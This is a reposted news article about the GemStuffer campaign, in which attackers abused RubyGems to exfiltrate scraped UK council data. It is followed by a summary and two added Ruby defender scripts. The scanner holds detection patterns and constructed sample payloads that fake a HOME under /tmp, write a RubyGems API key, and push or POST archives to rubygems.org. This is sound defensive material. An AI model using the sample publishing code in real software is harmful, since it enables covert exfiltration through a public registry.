LmCast :: Stay tuned in

Attackers Weaponize RubyGems for Data Dead Drops

Recorded: May 13, 2026, 10 p.m.

Original

Threat actors are publishing RubyGems packages that include scrapers targeting public-facing UK government servers, but with no clear objective.

Alexander Culafi, Senior News Writer, Dark Reading
May 13, 2026
4 Min Read

A new threat campaign is using RubyGems as a dead drop to store exfiltrated data, but the attacker's long-term plans are less clear.

Software development security vendor Socket published research concerning a campaign dubbed "GemStuffer," where an attacker abused the RubyGems package registry "as a data transport mechanism rather than a conventional malware distribution channel," according to a blog post. RubyGems is a package manager for the Ruby programming language, and acts as a way for developers to distribute Ruby programs or libraries, which are referred to as "gems."

On the surface, this would look like any number of attacks impacting the open source development supply chain in recent months. There are the Shai-Hulud self-propagating worms, novel ways to compromise open source AI models, and countless attacks against the NPM package ecosystem.

But in this case, the primary victim is unclear, as is the full scope of the threat activity. What organizations need to pay attention to is what the attacker might be planning next and how they can prepare.

GemStuffer Hints at Bigger Attacks

In this case, GemStuffer concerns more than 100 gems that appear to use RubyGems as a dead drop for data rather than to distribute conventional malware. The attackers are publishing a large number of packages with few or even no downloads that contain payloads that are "repetitive, noisy, and unusually self-contained," according to Socket.

The scripts within the packages merely fetch pages from UK local government portals used by the Lambeth, Wandsworth, and Southwark districts in London; scraped data includes council calendar pages, agenda listings, committee links, and other such public-facing information. This data is then published back to RubyGems as .gem archives through hardcoded API keys.

"In some samples, the payload creates a temporary RubyGems credential environment under /tmp, overrides HOME, builds a gem locally, and pushes it to rubygems.org," the blog post read. "Other variants skip the gem CLI entirely and POST the archive directly to the RubyGems API."

The attacker later downloads the package from RubyGems and extracts the data. No command-and-control (C2) server needed.

There are several unusual aspects to this campaign beyond the dead drop piece. For one, this activity was observed at the same time that RubyGems was under attack via an apparent coordinated spam-publishing campaign. Socket did not directly attach this campaign to that threat activity, though the vendor did mention it as having a similar abuse pattern to the spam campaign.

Second, the threat actor created an automated scraper with worm potential, yet they're using it to scrape public-facing data and not putting significant data into these packages to get potential victims to click on them. These gems do not contain conventional malware, but instead data collection tools and scripts for uploading packages using built-in API keys.

It could be a test run against government servers or practice using novel malware, but the motivation is unclear. "It may be registry spam, a proof-of-concept worm, an automated scraper misusing RubyGems as a storage layer, or a deliberate test of package registry abuse," Socket said in its post. "But the mechanics are intentional: repeated gem generation, version increments, hardcoded RubyGems credentials, direct registry pushes, and scraped data embedded inside package archives."

Feross Aboukhadijeh, founder and CEO of Socket, tells Dark Reading that the threat actor's technique was clever, but execution was "noisy."

"That usually points to testing, automation, or spam rather than a mature operation trying to preserve stealth," he says. "The actor may have cared less about staying hidden and more about proving that RubyGems could be used as a transport layer."

What Developers Need to Know About GemStuffer

For developers, Socket urged caution because, while none of these 155-plus compromised packages have been downloaded to a significant degree, GemStuffer shows a novel use case for exploiting package repositories (as dead drops). The campaign also serves as an example of why software package registries should not be implicitly trusted.

Organizations that download Ruby packages or believe they may be affected by GemStuffer should audit the /tmp folder on all potentially affected machines; identify the delivery vector if a package is present on a machine (as these gems are not self-propagating); and block outbound gem pushes in CI pipelines that do not publish gems, Socket said.

Aboukhadijeh says the business risk is "less about these specific junk gems being installed and more about what the behavior may be testing."

"This lands at a time when everyone in supply chain security is already on alert after seeing worm-like campaigns move across multiple ecosystems, including npm, PyPI, and Packagist. Security teams often focus on what packages developers install, but publishing activity needs attention too," he explains. "Defenders should know which developer machines, CI jobs, and service accounts are allowed to publish to public registries, and they should lock down those publishing workflows so only approved systems can publish approved packages."
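The article describes two publishing variants (a throwaway HOME under /tmp with a local credentials file, build and push via the gem CLI; or a direct POST of the archive to the RubyGems API with a hardcoded key). The following is an added defender-side example, not code from Socket or from the campaign's packages: a small static indicator scan that a reviewer could run over an unpacked gem before trusting it. The indicator names, the triage labels and the three sample payloads are constructed for illustration and are not taken from any real gem.

```ruby
# Static indicator scan for the publishing behaviours the article lists:
# a HOME override, staging under /tmp, a throwaway .gem/credentials file, a
# hardcoded RubyGems API key, `gem build` / `gem push`, or a direct POST to the
# RubyGems API. Added example; indicators and samples are constructed.
require 'tmpdir'

INDICATORS = {
  tmp_staging:           %r{['"]/tmp/},                           # works out of a /tmp directory
  home_override:         /ENV\[\s*['"]HOME['"]\s*\]\s*=/,          # points HOME at a throwaway dir
  credentials_written:   %r{\.gem/credentials},                   # references a RubyGems credentials file
  api_key_literal:       /:rubygems_api_key:\s*\S+/,              # credentials file content inline
  hardcoded_auth_header: /\[['"]Authorization['"]\]\s*=\s*['"]/,  # literal token in a request header
  gem_build:             /\bgem\s+build\b/,                       # builds a gem at run time
  gem_push:              /\bgem\s+push\b/,                        # publishes via the gem CLI
  direct_api_post:       %r{rubygems\.org/api/v1/gems},           # publishes via the HTTP API
}.freeze

PUBLISH = %i[gem_push direct_api_post].freeze
CREDS   = %i[credentials_written api_key_literal hardcoded_auth_header].freeze

# Return the names of every indicator present in one source file, in table order.
def scan_gem_source(source)
  INDICATORS.select { |_name, rx| source.match?(rx) }.keys
end

# Collapse a finding list into a triage label (constructed labels).
def classify(findings)
  publishes = (findings & PUBLISH).any?
  has_creds = (findings & CREDS).any?
  if    publishes && has_creds then :publishes_with_embedded_credentials
  elsif publishes              then :publishes_to_registry
  elsif has_creds              then :stages_credentials
  else                              :no_indicators
  end
end

# Scan every Ruby, gemspec and shell file under an unpacked gem directory.
def scan_gem_dir(dir)
  Dir.glob(File.join(dir, '**', '*.{rb,gemspec,sh}')).sort.to_h do |f|
    [f, scan_gem_source(File.read(f))]
  end
end

# Constructed sample 1: gem-CLI variant (fake HOME under /tmp, credentials file, build, push).
SAMPLE_CLI_VARIANT = <<~'RUBY'
  require 'fileutils'
  work = "/tmp/gs-work"
  FileUtils.mkdir_p("#{work}/.gem")
  ENV['HOME'] = work
  File.write("#{work}/.gem/credentials", ":rubygems_api_key: rubygems_CONSTRUCTEDKEY\n")
  system("gem build scraped.gemspec")
  system("gem push scraped-0.0.1.gem")
RUBY

# Constructed sample 2: direct-API variant (no gem CLI, token in a request header).
SAMPLE_API_VARIANT = <<~'RUBY'
  require 'net/http'
  uri = URI('https://rubygems.org/api/v1/gems')
  req = Net::HTTP::Post.new(uri)
  req['Authorization'] = 'rubygems_CONSTRUCTEDKEY'
  req.body = File.binread('scraped-0.0.2.gem')
  Net::HTTP.start(uri.host, uri.port, use_ssl: true) { |h| h.request(req) }
RUBY

# Constructed sample 3: an ordinary library with no publishing behaviour.
SAMPLE_BENIGN = <<~'RUBY'
  require 'nokogiri'
  def links(html)
    Nokogiri::HTML(html).css('a').map { |a| a['href'] }
  end
RUBY

if $PROGRAM_NAME == __FILE__
  { cli: SAMPLE_CLI_VARIANT, api: SAMPLE_API_VARIANT, benign: SAMPLE_BENIGN }.each do |name, src|
    findings = scan_gem_source(src)
    puts "#{name}: #{classify(findings)} #{findings.inspect}"
  end
end
```

The point of the two-axis classification is that neither axis alone is damning: plenty of legitimate release tooling runs `gem push`, and a credentials file on its own is not exfiltration. A library that both embeds a registry credential and publishes at run time, with nothing in its stated purpose that calls for it, is the combination worth pulling out of a CI cache for a closer look.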

Summarized

Threat actors have been weaponizing the RubyGems package registry to facilitate data exfiltration, utilizing it as a discreet dead drop mechanism rather than a typical malware distribution channel. This campaign, identified by software development security vendor Socket as "GemStuffer," involves publishing numerous RubyGems packages that contain scraping scripts targeting public-facing UK government portals, including those for the Lambeth, Wandsworth, and Southwark districts. These packages contain tools designed to collect public information such as council calendar pages, agenda listings, and committee links. The methodology involves embedding this scraped data within the .gem archives.

The process employed by the attackers is intentionally designed to leverage the RubyGems ecosystem for transport. In some samples, the payloads establish a temporary RubyGems credential environment within the /tmp directory, build a gem locally, and subsequently push this package to rubygems.org. Alternative variants bypass the standard gem command-line interface entirely, opting to directly POST the archives to the RubyGems API. After the data is stored in the repository, the attacker downloads the package from RubyGems to extract the exfiltrated information, thus eliminating the necessity for a traditional command and control server.

The observed activity displays several unusual characteristics. Unlike conventional attacks, these gems do not contain conventional malware; instead, they function as data collection tools and scripts designed for uploading packages, utilizing built-in API keys. This suggests the motivation may revolve around testing, automation, registry spam, a proof-of-concept worm, or the deliberate abuse of the package registry as a storage layer. Socket founder and CEO Feross Aboukhadijeh noted that while the technique was clever, the execution was noisy, which typically indicates testing, automation, or spam rather than a mature operation focused on stealth.

For developers and organizations, this campaign underscores that software package registries should not be implicitly trusted. Socket urged caution, emphasizing that organizations downloading Ruby packages should audit the /tmp folder on potentially affected machines and identify any delivery vector if a package is present. Furthermore, security teams must expand their focus beyond installed packages to monitor publishing activity. Defenders are advised to scrutinize which developer machines, continuous integration jobs, and service accounts are authorized to publish to public registries, and to implement controls that lock down these publishing workflows to ensure only approved systems can publish authorized packages. This approach is crucial for addressing the broader supply chain security concerns arising from worm-like campaigns across various ecosystems.
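The "/tmp audit" step above is easy to state and fiddly to do by hand, because the artefact being looked for is a throwaway HOME directory holding a .gem/credentials file, often next to locally built .gem archives. The following is an added defender-side example, not Socket's tooling: it walks a directory tree, reports each such credential environment, counts the archives beside it, and redacts the key value so the report itself does not leak the secret. The directory layout it builds for its own demo run and the API key value are constructed.

```ruby
# Audit a directory tree (e.g. /tmp) for stray RubyGems credential environments:
# a fake HOME whose .gem/credentials file carries an API key, typically beside
# locally built .gem archives. Added example; demo layout and key are constructed.
require 'find'
require 'fileutils'
require 'tmpdir'

API_KEY_LINE = /^:rubygems_api_key:\s*(\S+)/
DEMO_KEY = 'rubygems_CONSTRUCTEDEXAMPLEKEY0000' # constructed, not a real key

# Walk root and return every <fake HOME>/.gem/credentials file found.
# Find traverses dot-directories too, so hidden fake HOMEs are not missed.
def find_credential_files(root)
  hits = []
  Find.find(root) do |path|
    next unless File.file?(path)
    next unless File.basename(path) == 'credentials' && File.basename(File.dirname(path)) == '.gem'
    hits << path
  end
  hits.sort
end

# Redact a secret for a report: keep only a short prefix and its length.
def fingerprint(secret)
  "#{secret[0, 4]}...(#{secret.length} chars)"
end

# One finding per credentials file: where the fake HOME is, whether it holds an
# API key (never the key itself), and how many .gem archives sit beneath it.
def audit_tmp_for_gem_credentials(root)
  find_credential_files(root).map do |path|
    fake_home = File.dirname(File.dirname(path))
    key = File.read(path)[API_KEY_LINE, 1]
    archives = Dir.glob(File.join(fake_home, '**', '*.gem'))
    {
      credentials_file: path,
      fake_home: fake_home,
      has_api_key: !key.nil?,
      key_fingerprint: key && fingerprint(key),
      gem_archives: archives.size,
      under_tmp: fake_home.start_with?(Dir.tmpdir),
    }
  end
end

# Constructed layout mirroring the pattern described above, for a self-contained run:
# one fake HOME with credentials and a built archive, plus a decoy .gem dir without.
def build_demo_tree(root)
  home = File.join(root, 'gs-work')
  FileUtils.mkdir_p(File.join(home, '.gem'))
  File.write(File.join(home, '.gem', 'credentials'), ":rubygems_api_key: #{DEMO_KEY}\n")
  File.write(File.join(home, 'scraped-0.0.1.gem'), 'not a real gem archive')
  FileUtils.mkdir_p(File.join(root, 'unrelated', '.gem'))
  root
end

if $PROGRAM_NAME == __FILE__
  root = ARGV[0]
  if root
    audit_tmp_for_gem_credentials(root).each { |f| puts f.inspect }
  else
    Dir.mktmpdir('audit-demo') do |demo|
      audit_tmp_for_gem_credentials(build_demo_tree(demo)).each { |f| puts f.inspect }
    end
  end
end
```

Run it with a path argument (for instance /tmp on a suspect build host) to audit a real tree, or with no argument to see the demo layout reported. A hit on a machine that has no business publishing gems is the cue to trace the delivery vector, as the article recommends, and to revoke the key at the registry rather than just deleting the file.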